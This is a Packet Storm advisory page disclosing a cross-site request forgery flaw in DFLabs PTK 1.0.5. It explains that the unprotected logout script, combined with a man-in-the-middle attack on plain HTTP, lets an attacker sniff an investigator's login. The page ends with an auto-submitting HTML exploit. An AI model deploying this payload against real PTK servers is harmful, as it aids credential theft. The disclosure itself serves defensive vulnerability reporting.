exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

DFLabs PTK 1.0.5 Cross Site Request Forgery

DFLabs PTK 1.0.5 Cross Site Request Forgery
Posted Feb 23, 2012
Authored by Ivano Binetti

DFLabs PTK versions 1.0.5 and below suffer from a cross site request forgery vulnerability.

tags | exploit, csrf
SHA-256 | d0dd0d5291656beb902ee24cbf78e1bb2167be976fb908dc3778acf0386749d2

DFLabs PTK 1.0.5 Cross Site Request Forgery

Change Mirror Download
+---------------------------------------------------------------------------------------------------------------------------------------------------+
# Exploit Title : DFLabs PTK <= 1.0.5 Multiple Vulnerabilities (Steal Authentication Credentials)
# Date : 22-02-2012
# Author : Ivano Binetti (http://ivanobinetti.com)
# Software link : http://sourceforge.net/projects/ptk-forensics/files/latest/download
# Vendor site : http://www.dflabs.com
# Version : 1.0.5 (and lower)
# Tested on : Ubuntu 10.04
+---------------------------------------------------------------------------------------------------------------------------------------------------+
+-------------------------[Steal Authentication Credentials by Ivano Binetti]-----------------------------------------------------------------------+
Summary

1)Introduction
2)Vulnerability Description
3)Exploit

+---------------------------------------------------------------------------------------------------------------------------------------------------+

1)Introduction
DFLabs PTK is "an alternative advanced interface for the suite TSK (The Sleuth Kit)".

2)Vulnerability Description
PTK 1.0.5 (and lower) suffer from a CSRF vulnerability which allows an attacker to force administrator/investigator logout at web management
interface. Furthermore PTK's default installation (following the procedure indicated into PTK's "INSTALL" file) doesn't perform "http to https"
redirection in order to secure http connection by transport layer encryption. To default there isn't https redirection in the authentication
phase as well as there isn't https redirection during other PTK's activities. If an internal attacker (the nature of this tool makes difficult
that PTK may have public ip address) makes an Man in the Middle attack (I successfully made it using Dsniff and Ettercap) the CSRF vulnerability
found, forcing the administrator/investigator to logout, will aid the attacker to sniff authentication credentials. This condition can occur when
PTK is used in production environment and the investigator is conducting an analysis about internal people. Of course this logic can be extended
to any person which has access to internal LAN as an attacker which with a client-based exploit can control a internal client which can reach
PTK's server.

This vulnerability is correlated to poor session check into /<ptk_main_directory>/lib/logout.php script. In fact, differently from other php
script, where there is the php code like the following to session's check:

if (!isset($_SESSION['case_token']) or strcmp($_SESSION['user'],"admin")!=0 or strcmp($_SESSION['case_token'],$_GET['tk'])!=0 or $token_age > 300){
new AuditLog('Unauthorized access to delete_case '.sanitize(RemoveXSS($_GET['id']),PARANOID));
header("location: goto_home.php");

into /<ptk_main_directory>/lib/logout.php there isn't tha above check. This security flaw allows an attacker to force administrator/investigator
logout using a CSRF vulnerability.
When an administrator/investigator browses a web pages which contains the following html/javascript code he is forced to logout at the PTK web
management interface.

3)Exploit
<html>
<body onload="javascript:document.forms[0].submit()">
<H2>CSRF Exploit to force ADMIN/INVESTIGATOR logout</H2>
<form method="GET" name="form0" action="http://<ptk_ip_address>:80/lib/logout.php">
</form>
</body>
</html>

+--------------------------------------------------------------------------------------------------------------------------------------------------+
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close